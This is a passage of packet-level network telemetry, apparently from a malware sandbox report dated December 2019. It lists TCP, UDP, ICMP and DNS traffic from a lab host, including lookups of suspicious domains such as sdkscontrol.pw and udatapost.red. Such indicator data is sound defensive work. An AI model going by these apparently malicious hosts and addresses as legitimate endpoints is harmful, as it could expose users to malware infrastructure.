Dec 9, 2019 17:32:54.353954077 CET	80	49236	89.249.65.189	192.168.2.2
Dec 9, 2019 17:32:54.353965044 CET	80	49236	89.249.65.189	192.168.2.2
Dec 9, 2019 17:32:54.353993893 CET	49236	80	192.168.2.2	89.249.65.189
Dec 9, 2019 17:32:54.359127045 CET	49236	80	192.168.2.2	89.249.65.189
Dec 9, 2019 17:32:54.368922949 CET	49236	80	192.168.2.2	89.249.65.189
Dec 9, 2019 17:32:54.378731966 CET	80	49236	89.249.65.189	192.168.2.2
Dec 9, 2019 17:32:54.378768921 CET	80	49236	89.249.65.189	192.168.2.2
Dec 9, 2019 17:32:54.378782988 CET	80	49236	89.249.65.189	192.168.2.2
Dec 9, 2019 17:32:54.378809929 CET	80	49236	89.249.65.189	192.168.2.2
Dec 9, 2019 17:32:54.378823042 CET	80	49236	89.249.65.189	192.168.2.2
Dec 9, 2019 17:32:54.378834963 CET	80	49236	89.249.65.189	192.168.2.2
Dec 9, 2019 17:32:54.378848076 CET	80	49236	89.249.65.189	192.168.2.2
Dec 9, 2019 17:32:54.378869057 CET	80	49236	89.249.65.189	192.168.2.2
Dec 9, 2019 17:32:54.378881931 CET	80	49236	89.249.65.189	192.168.2.2
Dec 9, 2019 17:32:54.378894091 CET	80	49236	89.249.65.189	192.168.2.2
Dec 9, 2019 17:32:54.380141020 CET	49236	80	192.168.2.2	89.249.65.189
Dec 9, 2019 17:32:54.384331942 CET	80	49236	89.249.65.189	192.168.2.2
Dec 9, 2019 17:32:54.384402990 CET	80	49236	89.249.65.189	192.168.2.2
Dec 9, 2019 17:32:54.384421110 CET	80	49236	89.249.65.189	192.168.2.2
Dec 9, 2019 17:32:54.384433985 CET	80	49236	89.249.65.189	192.168.2.2
Dec 9, 2019 17:32:54.384447098 CET	80	49236	89.249.65.189	192.168.2.2
Dec 9, 2019 17:32:54.384459019 CET	80	49236	89.249.65.189	192.168.2.2
Dec 9, 2019 17:32:54.384469986 CET	49236	80	192.168.2.2	89.249.65.189
Dec 9, 2019 17:32:54.384504080 CET	80	49236	89.249.65.189	192.168.2.2
Dec 9, 2019 17:32:54.384521008 CET	80	49236	89.249.65.189	192.168.2.2
Dec 9, 2019 17:32:54.384533882 CET	80	49236	89.249.65.189	192.168.2.2
Dec 9, 2019 17:32:54.384546041 CET	80	49236	89.249.65.189	192.168.2.2
Dec 9, 2019 17:32:54.384676933 CET	49236	80	192.168.2.2	89.249.65.189
Dec 9, 2019 17:32:54.405280113 CET	80	49236	89.249.65.189	192.168.2.2
Dec 9, 2019 17:32:54.405440092 CET	80	49236	89.249.65.189	192.168.2.2
Dec 9, 2019 17:32:54.405472040 CET	80	49236	89.249.65.189	192.168.2.2
Dec 9, 2019 17:32:54.405472994 CET	49236	80	192.168.2.2	89.249.65.189
Dec 9, 2019 17:32:54.405484915 CET	80	49236	89.249.65.189	192.168.2.2
Dec 9, 2019 17:32:54.405497074 CET	80	49236	89.249.65.189	192.168.2.2
Dec 9, 2019 17:32:54.405509949 CET	80	49236	89.249.65.189	192.168.2.2
Dec 9, 2019 17:32:54.405522108 CET	80	49236	89.249.65.189	192.168.2.2
Dec 9, 2019 17:32:54.405533075 CET	80	49236	89.249.65.189	192.168.2.2
Dec 9, 2019 17:32:54.405632973 CET	80	49236	89.249.65.189	192.168.2.2
Dec 9, 2019 17:32:54.405702114 CET	80	49236	89.249.65.189	192.168.2.2
Dec 9, 2019 17:32:54.405710936 CET	49236	80	192.168.2.2	89.249.65.189
Dec 9, 2019 17:32:54.405719042 CET	80	49236	89.249.65.189	192.168.2.2
Dec 9, 2019 17:32:54.405749083 CET	80	49236	89.249.65.189	192.168.2.2
Dec 9, 2019 17:32:54.405761003 CET	80	49236	89.249.65.189	192.168.2.2
Dec 9, 2019 17:32:54.405772924 CET	80	49236	89.249.65.189	192.168.2.2
Dec 9, 2019 17:32:54.405795097 CET	80	49236	89.249.65.189	192.168.2.2
Dec 9, 2019 17:32:54.405807018 CET	80	49236	89.249.65.189	192.168.2.2
Dec 9, 2019 17:32:54.405818939 CET	80	49236	89.249.65.189	192.168.2.2
Dec 9, 2019 17:32:54.405829906 CET	80	49236	89.249.65.189	192.168.2.2
Dec 9, 2019 17:32:54.405843019 CET	80	49236	89.249.65.189	192.168.2.2
Dec 9, 2019 17:32:54.406013966 CET	49236	80	192.168.2.2	89.249.65.189
Dec 9, 2019 17:32:54.409606934 CET	80	49236	89.249.65.189	192.168.2.2
Dec 9, 2019 17:32:54.409631968 CET	80	49236	89.249.65.189	192.168.2.2
Dec 9, 2019 17:32:54.409723043 CET	80	49236	89.249.65.189	192.168.2.2
Dec 9, 2019 17:32:54.409755945 CET	49236	80	192.168.2.2	89.249.65.189
Dec 9, 2019 17:32:54.409784079 CET	80	49236	89.249.65.189	192.168.2.2
Dec 9, 2019 17:32:54.409842968 CET	80	49236	89.249.65.189	192.168.2.2
Dec 9, 2019 17:32:54.409856081 CET	80	49236	89.249.65.189	192.168.2.2
Dec 9, 2019 17:32:54.409868956 CET	80	49236	89.249.65.189	192.168.2.2
Dec 9, 2019 17:32:54.409897089 CET	80	49236	89.249.65.189	192.168.2.2
Dec 9, 2019 17:32:54.409909010 CET	80	49236	89.249.65.189	192.168.2.2
Dec 9, 2019 17:32:54.409920931 CET	80	49236	89.249.65.189	192.168.2.2
Dec 9, 2019 17:32:54.409949064 CET	80	49236	89.249.65.189	192.168.2.2
Dec 9, 2019 17:32:54.409960985 CET	80	49236	89.249.65.189	192.168.2.2
Dec 9, 2019 17:32:54.409971952 CET	80	49236	89.249.65.189	192.168.2.2
Dec 9, 2019 17:32:54.409984112 CET	80	49236	89.249.65.189	192.168.2.2
Dec 9, 2019 17:32:54.410012007 CET	80	49236	89.249.65.189	192.168.2.2
Dec 9, 2019 17:32:54.410023928 CET	80	49236	89.249.65.189	192.168.2.2
Dec 9, 2019 17:32:54.410034895 CET	80	49236	89.249.65.189	192.168.2.2
Dec 9, 2019 17:32:54.410051107 CET	80	49236	89.249.65.189	192.168.2.2
Dec 9, 2019 17:32:54.410062075 CET	80	49236	89.249.65.189	192.168.2.2
Dec 9, 2019 17:32:54.410073996 CET	80	49236	89.249.65.189	192.168.2.2
Dec 9, 2019 17:32:54.410218000 CET	49236	80	192.168.2.2	89.249.65.189
Dec 9, 2019 17:32:54.458386898 CET	49236	80	192.168.2.2	89.249.65.189
Dec 9, 2019 17:32:54.484154940 CET	80	49236	89.249.65.189	192.168.2.2
Dec 9, 2019 17:32:54.484347105 CET	80	49236	89.249.65.189	192.168.2.2
Dec 9, 2019 17:32:54.484364033 CET	80	49236	89.249.65.189	192.168.2.2
Dec 9, 2019 17:32:54.484376907 CET	80	49236	89.249.65.189	192.168.2.2
Dec 9, 2019 17:32:54.484390020 CET	80	49236	89.249.65.189	192.168.2.2
Dec 9, 2019 17:32:54.484401941 CET	80	49236	89.249.65.189	192.168.2.2
Dec 9, 2019 17:32:54.484415054 CET	80	49236	89.249.65.189	192.168.2.2
Dec 9, 2019 17:32:54.484426022 CET	80	49236	89.249.65.189	192.168.2.2
Dec 9, 2019 17:32:54.484436989 CET	80	49236	89.249.65.189	192.168.2.2
Dec 9, 2019 17:32:54.484447002 CET	49236	80	192.168.2.2	89.249.65.189
Dec 9, 2019 17:32:54.484450102 CET	80	49236	89.249.65.189	192.168.2.2
Dec 9, 2019 17:32:54.484494925 CET	80	49236	89.249.65.189	192.168.2.2
Dec 9, 2019 17:32:54.484508991 CET	80	49236	89.249.65.189	192.168.2.2
Dec 9, 2019 17:32:54.484530926 CET	80	49236	89.249.65.189	192.168.2.2
Dec 9, 2019 17:32:54.484543085 CET	80	49236	89.249.65.189	192.168.2.2
Dec 9, 2019 17:32:54.484555960 CET	80	49236	89.249.65.189	192.168.2.2
Dec 9, 2019 17:32:54.484596014 CET	80	49236	89.249.65.189	192.168.2.2
Dec 9, 2019 17:32:54.484610081 CET	80	49236	89.249.65.189	192.168.2.2
Dec 9, 2019 17:32:54.484622002 CET	80	49236	89.249.65.189	192.168.2.2
Dec 9, 2019 17:32:54.484651089 CET	80	49236	89.249.65.189	192.168.2.2
Dec 9, 2019 17:32:54.484667063 CET	80	49236	89.249.65.189	192.168.2.2
Dec 9, 2019 17:32:54.484679937 CET	80	49236	89.249.65.189	192.168.2.2
Dec 9, 2019 17:32:54.484710932 CET	49236	80	192.168.2.2	89.249.65.189
Dec 9, 2019 17:32:54.484714985 CET	80	49236	89.249.65.189	192.168.2.2
Dec 9, 2019 17:32:54.484726906 CET	80	49236	89.249.65.189	192.168.2.2
Dec 9, 2019 17:32:54.484738111 CET	80	49236	89.249.65.189	192.168.2.2
Dec 9, 2019 17:32:54.484766960 CET	80	49236	89.249.65.189	192.168.2.2
Dec 9, 2019 17:32:54.484778881 CET	80	49236	89.249.65.189	192.168.2.2
Dec 9, 2019 17:32:54.484791040 CET	80	49236	89.249.65.189	192.168.2.2
Dec 9, 2019 17:32:54.484803915 CET	80	49236	89.249.65.189	192.168.2.2
Dec 9, 2019 17:32:54.484847069 CET	80	49236	89.249.65.189	192.168.2.2
Dec 9, 2019 17:32:54.484859943 CET	80	49236	89.249.65.189	192.168.2.2
Dec 9, 2019 17:32:54.484875917 CET	80	49236	89.249.65.189	192.168.2.2
Dec 9, 2019 17:32:54.484888077 CET	80	49236	89.249.65.189	192.168.2.2
Dec 9, 2019 17:32:54.484899044 CET	80	49236	89.249.65.189	192.168.2.2
Dec 9, 2019 17:32:54.484911919 CET	80	49236	89.249.65.189	192.168.2.2
Dec 9, 2019 17:32:54.484925032 CET	80	49236	89.249.65.189	192.168.2.2
Dec 9, 2019 17:32:54.484936953 CET	80	49236	89.249.65.189	192.168.2.2
Dec 9, 2019 17:32:54.484950066 CET	80	49236	89.249.65.189	192.168.2.2
Dec 9, 2019 17:32:54.484961987 CET	80	49236	89.249.65.189	192.168.2.2
Dec 9, 2019 17:32:54.484973907 CET	80	49236	89.249.65.189	192.168.2.2
Dec 9, 2019 17:32:54.484986067 CET	80	49236	89.249.65.189	192.168.2.2
Dec 9, 2019 17:32:54.484998941 CET	80	49236	89.249.65.189	192.168.2.2
Dec 9, 2019 17:32:54.485011101 CET	80	49236	89.249.65.189	192.168.2.2
Dec 9, 2019 17:32:54.485022068 CET	80	49236	89.249.65.189	192.168.2.2
Dec 9, 2019 17:32:54.485033035 CET	80	49236	89.249.65.189	192.168.2.2
Dec 9, 2019 17:32:54.485044003 CET	80	49236	89.249.65.189	192.168.2.2
Dec 9, 2019 17:32:54.485057116 CET	80	49236	89.249.65.189	192.168.2.2
Dec 9, 2019 17:32:54.485068083 CET	80	49236	89.249.65.189	192.168.2.2
Dec 9, 2019 17:32:54.485080004 CET	80	49236	89.249.65.189	192.168.2.2
Dec 9, 2019 17:32:54.485093117 CET	80	49236	89.249.65.189	192.168.2.2
Dec 9, 2019 17:32:54.485105038 CET	80	49236	89.249.65.189	192.168.2.2
Dec 9, 2019 17:32:54.485116959 CET	80	49236	89.249.65.189	192.168.2.2
Dec 9, 2019 17:32:54.485129118 CET	80	49236	89.249.65.189	192.168.2.2
Dec 9, 2019 17:32:54.485774040 CET	49236	80	192.168.2.2	89.249.65.189
Dec 9, 2019 17:32:54.486664057 CET	49236	80	192.168.2.2	89.249.65.189
Dec 9, 2019 17:32:54.510982037 CET	80	49236	89.249.65.189	192.168.2.2
Dec 9, 2019 17:32:54.511156082 CET	80	49236	89.249.65.189	192.168.2.2
Dec 9, 2019 17:32:54.511169910 CET	80	49236	89.249.65.189	192.168.2.2
Dec 9, 2019 17:32:54.511182070 CET	80	49236	89.249.65.189	192.168.2.2
Dec 9, 2019 17:32:54.511193037 CET	80	49236	89.249.65.189	192.168.2.2
Dec 9, 2019 17:32:54.511204958 CET	80	49236	89.249.65.189	192.168.2.2
Dec 9, 2019 17:32:54.511215925 CET	80	49236	89.249.65.189	192.168.2.2
Dec 9, 2019 17:32:54.511228085 CET	80	49236	89.249.65.189	192.168.2.2
Dec 9, 2019 17:32:54.511245012 CET	80	49236	89.249.65.189	192.168.2.2
Dec 9, 2019 17:32:54.511256933 CET	80	49236	89.249.65.189	192.168.2.2
Dec 9, 2019 17:32:54.516210079 CET	49236	80	192.168.2.2	89.249.65.189
Dec 9, 2019 17:32:54.530119896 CET	49236	80	192.168.2.2	89.249.65.189
Dec 9, 2019 17:32:54.553657055 CET	80	49236	89.249.65.189	192.168.2.2
Dec 9, 2019 17:32:54.553842068 CET	49236	80	192.168.2.2	89.249.65.189
Dec 9, 2019 17:32:54.553857088 CET	80	49236	89.249.65.189	192.168.2.2
Dec 9, 2019 17:32:54.553873062 CET	80	49236	89.249.65.189	192.168.2.2
Dec 9, 2019 17:32:54.553885937 CET	80	49236	89.249.65.189	192.168.2.2
Dec 9, 2019 17:32:54.553899050 CET	80	49236	89.249.65.189	192.168.2.2
Dec 9, 2019 17:32:54.553919077 CET	80	49236	89.249.65.189	192.168.2.2
Dec 9, 2019 17:32:54.553931952 CET	80	49236	89.249.65.189	192.168.2.2
Dec 9, 2019 17:32:54.553944111 CET	80	49236	89.249.65.189	192.168.2.2
Dec 9, 2019 17:32:54.553956032 CET	80	49236	89.249.65.189	192.168.2.2
Dec 9, 2019 17:32:54.553987026 CET	80	49236	89.249.65.189	192.168.2.2
Dec 9, 2019 17:32:54.553998947 CET	80	49236	89.249.65.189	192.168.2.2
Dec 9, 2019 17:32:54.554011106 CET	80	49236	89.249.65.189	192.168.2.2
Dec 9, 2019 17:32:54.554053068 CET	80	49236	89.249.65.189	192.168.2.2
Dec 9, 2019 17:32:54.554065943 CET	80	49236	89.249.65.189	192.168.2.2
Dec 9, 2019 17:32:54.554079056 CET	80	49236	89.249.65.189	192.168.2.2
Dec 9, 2019 17:32:54.554105043 CET	80	49236	89.249.65.189	192.168.2.2
Dec 9, 2019 17:32:54.554116964 CET	80	49236	89.249.65.189	192.168.2.2
Dec 9, 2019 17:32:54.554130077 CET	80	49236	89.249.65.189	192.168.2.2
Dec 9, 2019 17:32:54.554171085 CET	80	49236	89.249.65.189	192.168.2.2
Dec 9, 2019 17:32:54.554183960 CET	80	49236	89.249.65.189	192.168.2.2
Dec 9, 2019 17:32:54.554197073 CET	80	49236	89.249.65.189	192.168.2.2
Dec 9, 2019 17:32:54.554229021 CET	80	49236	89.249.65.189	192.168.2.2
Dec 9, 2019 17:32:54.554240942 CET	80	49236	89.249.65.189	192.168.2.2
Dec 9, 2019 17:32:54.554253101 CET	80	49236	89.249.65.189	192.168.2.2
Dec 9, 2019 17:32:54.554271936 CET	80	49236	89.249.65.189	192.168.2.2
Dec 9, 2019 17:32:54.554284096 CET	80	49236	89.249.65.189	192.168.2.2
Dec 9, 2019 17:32:54.554296017 CET	80	49236	89.249.65.189	192.168.2.2
Dec 9, 2019 17:32:54.554307938 CET	80	49236	89.249.65.189	192.168.2.2
Dec 9, 2019 17:32:54.554341078 CET	80	49236	89.249.65.189	192.168.2.2
Dec 9, 2019 17:32:54.554353952 CET	80	49236	89.249.65.189	192.168.2.2
Dec 9, 2019 17:32:54.554366112 CET	80	49236	89.249.65.189	192.168.2.2
Dec 9, 2019 17:32:54.554395914 CET	80	49236	89.249.65.189	192.168.2.2
Dec 9, 2019 17:32:54.554408073 CET	80	49236	89.249.65.189	192.168.2.2
Dec 9, 2019 17:32:54.554419994 CET	80	49236	89.249.65.189	192.168.2.2
Dec 9, 2019 17:32:54.554433107 CET	80	49236	89.249.65.189	192.168.2.2
Dec 9, 2019 17:32:54.554449081 CET	80	49236	89.249.65.189	192.168.2.2
Dec 9, 2019 17:32:54.554461002 CET	80	49236	89.249.65.189	192.168.2.2
Dec 9, 2019 17:32:54.554474115 CET	80	49236	89.249.65.189	192.168.2.2
Dec 9, 2019 17:32:54.554485083 CET	80	49236	89.249.65.189	192.168.2.2
Dec 9, 2019 17:32:54.554498911 CET	80	49236	89.249.65.189	192.168.2.2
Dec 9, 2019 17:32:54.554511070 CET	80	49236	89.249.65.189	192.168.2.2
Dec 9, 2019 17:32:54.554522991 CET	80	49236	89.249.65.189	192.168.2.2
Dec 9, 2019 17:32:54.554534912 CET	80	49236	89.249.65.189	192.168.2.2
Dec 9, 2019 17:32:54.554547071 CET	80	49236	89.249.65.189	192.168.2.2
Dec 9, 2019 17:32:54.554558039 CET	80	49236	89.249.65.189	192.168.2.2
Dec 9, 2019 17:32:54.554569960 CET	80	49236	89.249.65.189	192.168.2.2
Dec 9, 2019 17:32:54.554582119 CET	80	49236	89.249.65.189	192.168.2.2
Dec 9, 2019 17:32:54.554594040 CET	80	49236	89.249.65.189	192.168.2.2
Dec 9, 2019 17:32:54.554605961 CET	80	49236	89.249.65.189	192.168.2.2
Dec 9, 2019 17:32:54.554617882 CET	80	49236	89.249.65.189	192.168.2.2
Dec 9, 2019 17:32:54.554630041 CET	80	49236	89.249.65.189	192.168.2.2
Dec 9, 2019 17:32:54.554642916 CET	80	49236	89.249.65.189	192.168.2.2
Dec 9, 2019 17:32:54.554655075 CET	80	49236	89.249.65.189	192.168.2.2
Dec 9, 2019 17:32:54.554665089 CET	80	49236	89.249.65.189	192.168.2.2
Dec 9, 2019 17:32:54.568195105 CET	49236	80	192.168.2.2	89.249.65.189
Dec 9, 2019 17:32:54.568294048 CET	49236	80	192.168.2.2	89.249.65.189
Dec 9, 2019 17:32:54.627475023 CET	49236	80	192.168.2.2	89.249.65.189
Dec 9, 2019 17:32:59.436928988 CET	80	49236	89.249.65.189	192.168.2.2
Dec 9, 2019 17:32:59.437063932 CET	49236	80	192.168.2.2	89.249.65.189
Dec 9, 2019 17:33:09.757499933 CET	49238	80	192.168.2.2	89.249.65.189
Dec 9, 2019 17:33:09.757793903 CET	49239	80	192.168.2.2	89.249.65.189
Dec 9, 2019 17:33:09.783452034 CET	80	49238	89.249.65.189	192.168.2.2
Dec 9, 2019 17:33:09.783480883 CET	80	49239	89.249.65.189	192.168.2.2
Dec 9, 2019 17:33:09.783596039 CET	49238	80	192.168.2.2	89.249.65.189
Dec 9, 2019 17:33:09.783624887 CET	49239	80	192.168.2.2	89.249.65.189
Dec 9, 2019 17:33:09.786607981 CET	49238	80	192.168.2.2	89.249.65.189
Dec 9, 2019 17:33:09.812555075 CET	80	49238	89.249.65.189	192.168.2.2
Dec 9, 2019 17:33:09.831155062 CET	80	49238	89.249.65.189	192.168.2.2
Dec 9, 2019 17:33:09.831183910 CET	80	49238	89.249.65.189	192.168.2.2
Dec 9, 2019 17:33:09.831197023 CET	80	49238	89.249.65.189	192.168.2.2
Dec 9, 2019 17:33:09.831306934 CET	49238	80	192.168.2.2	89.249.65.189

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Dec 9, 2019 17:29:53.613779068 CET	62886	53	192.168.2.2	8.8.8.8
Dec 9, 2019 17:29:53.639117002 CET	53	62886	8.8.8.8	192.168.2.2
Dec 9, 2019 17:30:13.177490950 CET	58290	53	192.168.2.2	8.8.8.8
Dec 9, 2019 17:30:13.214185953 CET	53	58290	8.8.8.8	192.168.2.2
Dec 9, 2019 17:30:13.217076063 CET	64779	53	192.168.2.2	8.8.8.8
Dec 9, 2019 17:30:13.251945972 CET	53	64779	8.8.8.8	192.168.2.2
Dec 9, 2019 17:30:13.449781895 CET	62788	53	192.168.2.2	8.8.8.8
Dec 9, 2019 17:30:13.485836029 CET	53	62788	8.8.8.8	192.168.2.2
Dec 9, 2019 17:30:15.747769117 CET	56401	53	192.168.2.2	8.8.8.8
Dec 9, 2019 17:30:15.781606913 CET	53	56401	8.8.8.8	192.168.2.2
Dec 9, 2019 17:30:15.783479929 CET	51428	53	192.168.2.2	8.8.8.8
Dec 9, 2019 17:30:15.817152977 CET	53	51428	8.8.8.8	192.168.2.2
Dec 9, 2019 17:30:15.869913101 CET	54696	53	192.168.2.2	8.8.8.8
Dec 9, 2019 17:30:15.911938906 CET	53	54696	8.8.8.8	192.168.2.2
Dec 9, 2019 17:30:18.176856995 CET	52914	53	192.168.2.2	8.8.8.8
Dec 9, 2019 17:30:18.210606098 CET	53	52914	8.8.8.8	192.168.2.2
Dec 9, 2019 17:30:20.482105017 CET	62324	53	192.168.2.2	8.8.8.8
Dec 9, 2019 17:30:20.516124964 CET	53	62324	8.8.8.8	192.168.2.2
Dec 9, 2019 17:30:20.544868946 CET	60124	53	192.168.2.2	8.8.8.8
Dec 9, 2019 17:30:20.580611944 CET	53	60124	8.8.8.8	192.168.2.2
Dec 9, 2019 17:30:22.851192951 CET	57454	53	192.168.2.2	8.8.8.8
Dec 9, 2019 17:30:22.885174036 CET	53	57454	8.8.8.8	192.168.2.2
Dec 9, 2019 17:30:25.399101019 CET	58883	53	192.168.2.2	8.8.8.8
Dec 9, 2019 17:30:25.434479952 CET	53	58883	8.8.8.8	192.168.2.2
Dec 9, 2019 17:30:25.969094992 CET	51677	53	192.168.2.2	8.8.8.8
Dec 9, 2019 17:30:25.994395971 CET	53	51677	8.8.8.8	192.168.2.2
Dec 9, 2019 17:30:25.997461081 CET	63398	53	192.168.2.2	8.8.8.8
Dec 9, 2019 17:30:26.022831917 CET	53	63398	8.8.8.8	192.168.2.2
Dec 9, 2019 17:30:26.565798044 CET	54401	53	192.168.2.2	8.8.8.8
Dec 9, 2019 17:30:26.601397991 CET	53	54401	8.8.8.8	192.168.2.2
Dec 9, 2019 17:30:27.560507059 CET	54401	53	192.168.2.2	8.8.8.8
Dec 9, 2019 17:30:27.585989952 CET	53	54401	8.8.8.8	192.168.2.2
Dec 9, 2019 17:30:28.561358929 CET	54401	53	192.168.2.2	8.8.8.8
Dec 9, 2019 17:30:28.595232964 CET	53	54401	8.8.8.8	192.168.2.2
Dec 9, 2019 17:30:30.564404011 CET	54401	53	192.168.2.2	8.8.8.8
Dec 9, 2019 17:30:30.589816093 CET	53	54401	8.8.8.8	192.168.2.2
Dec 9, 2019 17:30:34.569839954 CET	54401	53	192.168.2.2	8.8.8.8
Dec 9, 2019 17:30:34.595238924 CET	53	54401	8.8.8.8	192.168.2.2
Dec 9, 2019 17:31:13.606642008 CET	58973	53	192.168.2.2	8.8.8.8
Dec 9, 2019 17:31:13.640374899 CET	53	58973	8.8.8.8	192.168.2.2
Dec 9, 2019 17:31:13.974874020 CET	49168	53	192.168.2.2	8.8.8.8
Dec 9, 2019 17:31:14.008660078 CET	53	49168	8.8.8.8	192.168.2.2
Dec 9, 2019 17:31:43.030735970 CET	57621	53	192.168.2.2	8.8.8.8
Dec 9, 2019 17:31:43.038477898 CET	59979	53	192.168.2.2	8.8.8.8
Dec 9, 2019 17:31:43.056171894 CET	53	57621	8.8.8.8	192.168.2.2
Dec 9, 2019 17:31:43.074984074 CET	53	59979	8.8.8.8	192.168.2.2
Dec 9, 2019 17:31:44.030464888 CET	57621	53	192.168.2.2	8.8.8.8
Dec 9, 2019 17:31:44.055994987 CET	53	57621	8.8.8.8	192.168.2.2
Dec 9, 2019 17:31:45.031281948 CET	57621	53	192.168.2.2	8.8.8.8
Dec 9, 2019 17:31:45.056761026 CET	53	57621	8.8.8.8	192.168.2.2
Dec 9, 2019 17:31:47.046633959 CET	57621	53	192.168.2.2	8.8.8.8
Dec 9, 2019 17:31:47.072026014 CET	53	57621	8.8.8.8	192.168.2.2
Dec 9, 2019 17:31:51.050462961 CET	57621	53	192.168.2.2	8.8.8.8
Dec 9, 2019 17:31:51.075930119 CET	53	57621	8.8.8.8	192.168.2.2
Dec 9, 2019 17:31:56.287745953 CET	51538	53	192.168.2.2	8.8.8.8
Dec 9, 2019 17:31:56.325609922 CET	53	51538	8.8.8.8	192.168.2.2
Dec 9, 2019 17:31:58.569952965 CET	62242	53	192.168.2.2	8.8.8.8
Dec 9, 2019 17:31:58.603707075 CET	53	62242	8.8.8.8	192.168.2.2
Dec 9, 2019 17:32:11.189781904 CET	57575	53	192.168.2.2	8.8.8.8
Dec 9, 2019 17:32:11.231797934 CET	53	57575	8.8.8.8	192.168.2.2
Dec 9, 2019 17:32:12.379726887 CET	57443	53	192.168.2.2	8.8.8.8
Dec 9, 2019 17:32:12.393388033 CET	58657	53	192.168.2.2	8.8.8.8
Dec 9, 2019 17:32:12.405098915 CET	53	57443	8.8.8.8	192.168.2.2
Dec 9, 2019 17:32:12.418726921 CET	53	58657	8.8.8.8	192.168.2.2
Dec 9, 2019 17:32:13.326448917 CET	57614	53	192.168.2.2	8.8.8.8
Dec 9, 2019 17:32:13.328608990 CET	54848	53	192.168.2.2	8.8.8.8
Dec 9, 2019 17:32:13.330822945 CET	57087	53	192.168.2.2	8.8.8.8
Dec 9, 2019 17:32:13.333172083 CET	63803	53	192.168.2.2	8.8.8.8
Dec 9, 2019 17:32:13.335388899 CET	60620	53	192.168.2.2	8.8.8.8
Dec 9, 2019 17:32:13.337359905 CET	54794	53	192.168.2.2	8.8.8.8
Dec 9, 2019 17:32:13.351880074 CET	53	57614	8.8.8.8	192.168.2.2
Dec 9, 2019 17:32:13.356146097 CET	53	57087	8.8.8.8	192.168.2.2
Dec 9, 2019 17:32:13.358520985 CET	53	63803	8.8.8.8	192.168.2.2
Dec 9, 2019 17:32:13.362816095 CET	53	54794	8.8.8.8	192.168.2.2
Dec 9, 2019 17:32:13.372647047 CET	53	54848	8.8.8.8	192.168.2.2
Dec 9, 2019 17:32:13.373079062 CET	57443	53	192.168.2.2	8.8.8.8
Dec 9, 2019 17:32:13.384584904 CET	53	60620	8.8.8.8	192.168.2.2
Dec 9, 2019 17:32:13.392066956 CET	58657	53	192.168.2.2	8.8.8.8
Dec 9, 2019 17:32:13.398385048 CET	53	57443	8.8.8.8	192.168.2.2
Dec 9, 2019 17:32:13.417361021 CET	53	58657	8.8.8.8	192.168.2.2
Dec 9, 2019 17:32:14.373660088 CET	57443	53	192.168.2.2	8.8.8.8
Dec 9, 2019 17:32:14.394001961 CET	58657	53	192.168.2.2	8.8.8.8
Dec 9, 2019 17:32:14.398982048 CET	53	57443	8.8.8.8	192.168.2.2
Dec 9, 2019 17:32:14.421315908 CET	53	58657	8.8.8.8	192.168.2.2
Dec 9, 2019 17:32:15.029454947 CET	60874	53	192.168.2.2	8.8.8.8
Dec 9, 2019 17:32:15.065457106 CET	53	60874	8.8.8.8	192.168.2.2
Dec 9, 2019 17:32:16.376458883 CET	57443	53	192.168.2.2	8.8.8.8
Dec 9, 2019 17:32:16.396802902 CET	58657	53	192.168.2.2	8.8.8.8
Dec 9, 2019 17:32:16.401820898 CET	53	57443	8.8.8.8	192.168.2.2
Dec 9, 2019 17:32:16.422070026 CET	53	58657	8.8.8.8	192.168.2.2
Dec 9, 2019 17:32:20.384521008 CET	57443	53	192.168.2.2	8.8.8.8
Dec 9, 2019 17:32:20.406068087 CET	58657	53	192.168.2.2	8.8.8.8
Dec 9, 2019 17:32:20.409857035 CET	53	57443	8.8.8.8	192.168.2.2
Dec 9, 2019 17:32:20.431386948 CET	53	58657	8.8.8.8	192.168.2.2
Dec 9, 2019 17:32:54.225445986 CET	52109	53	192.168.2.2	8.8.8.8
Dec 9, 2019 17:32:54.261190891 CET	53	52109	8.8.8.8	192.168.2.2
Dec 9, 2019 17:32:55.275013924 CET	62687	53	192.168.2.2	8.8.8.8
Dec 9, 2019 17:32:55.300395966 CET	53	62687	8.8.8.8	192.168.2.2
Dec 9, 2019 17:32:55.306220055 CET	60006	53	192.168.2.2	8.8.8.8
Dec 9, 2019 17:32:55.331583023 CET	53	60006	8.8.8.8	192.168.2.2
Dec 9, 2019 17:32:55.364969015 CET	60144	53	192.168.2.2	8.8.8.8
Dec 9, 2019 17:32:55.367017984 CET	65304	53	192.168.2.2	8.8.8.8
Dec 9, 2019 17:32:55.400722980 CET	53	65304	8.8.8.8	192.168.2.2
Dec 9, 2019 17:32:55.403219938 CET	58997	53	192.168.2.2	8.8.8.8
Dec 9, 2019 17:32:55.414704084 CET	53	60144	8.8.8.8	192.168.2.2
Dec 9, 2019 17:32:55.417087078 CET	58123	53	192.168.2.2	8.8.8.8
Dec 9, 2019 17:32:55.436881065 CET	53	58997	8.8.8.8	192.168.2.2
Dec 9, 2019 17:32:55.450731039 CET	53	58123	8.8.8.8	192.168.2.2
Dec 9, 2019 17:33:09.668418884 CET	54203	53	192.168.2.2	8.8.8.8
Dec 9, 2019 17:33:09.701975107 CET	53	54203	8.8.8.8	192.168.2.2

ICMP Packets

Timestamp	Source IP	Dest IP	Checksum	Type
Dec 9, 2019 17:30:13.253720999 CET	192.168.2.2	192.64.119.156	4d56	Echo
Dec 9, 2019 17:30:13.427500010 CET	192.64.119.156	192.168.2.2	5556	Echo Reply
Dec 9, 2019 17:30:15.819868088 CET	192.168.2.2	94.100.28.184	4d55	Echo
Dec 9, 2019 17:30:15.850317001 CET	94.100.28.184	192.168.2.2	5555	Echo Reply

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class
Dec 9, 2019 17:30:13.177490950 CET	192.168.2.2	8.8.8.8	0xb088	Standard query (0)	makretplaise.xyz	A (IP address)	IN (0x0001)
Dec 9, 2019 17:30:13.217076063 CET	192.168.2.2	8.8.8.8	0xefac	Standard query (0)	makretplaise.xyz	A (IP address)	IN (0x0001)
Dec 9, 2019 17:30:13.449781895 CET	192.168.2.2	8.8.8.8	0xaa31	Standard query (0)	sdkscontrol.pw	A (IP address)	IN (0x0001)
Dec 9, 2019 17:30:15.747769117 CET	192.168.2.2	8.8.8.8	0xe96d	Standard query (0)	sutsyiekha.casa	A (IP address)	IN (0x0001)
Dec 9, 2019 17:30:15.783479929 CET	192.168.2.2	8.8.8.8	0xb082	Standard query (0)	sutsyiekha.casa	A (IP address)	IN (0x0001)
Dec 9, 2019 17:30:15.869913101 CET	192.168.2.2	8.8.8.8	0x15cd	Standard query (0)	udatapost.red	A (IP address)	IN (0x0001)
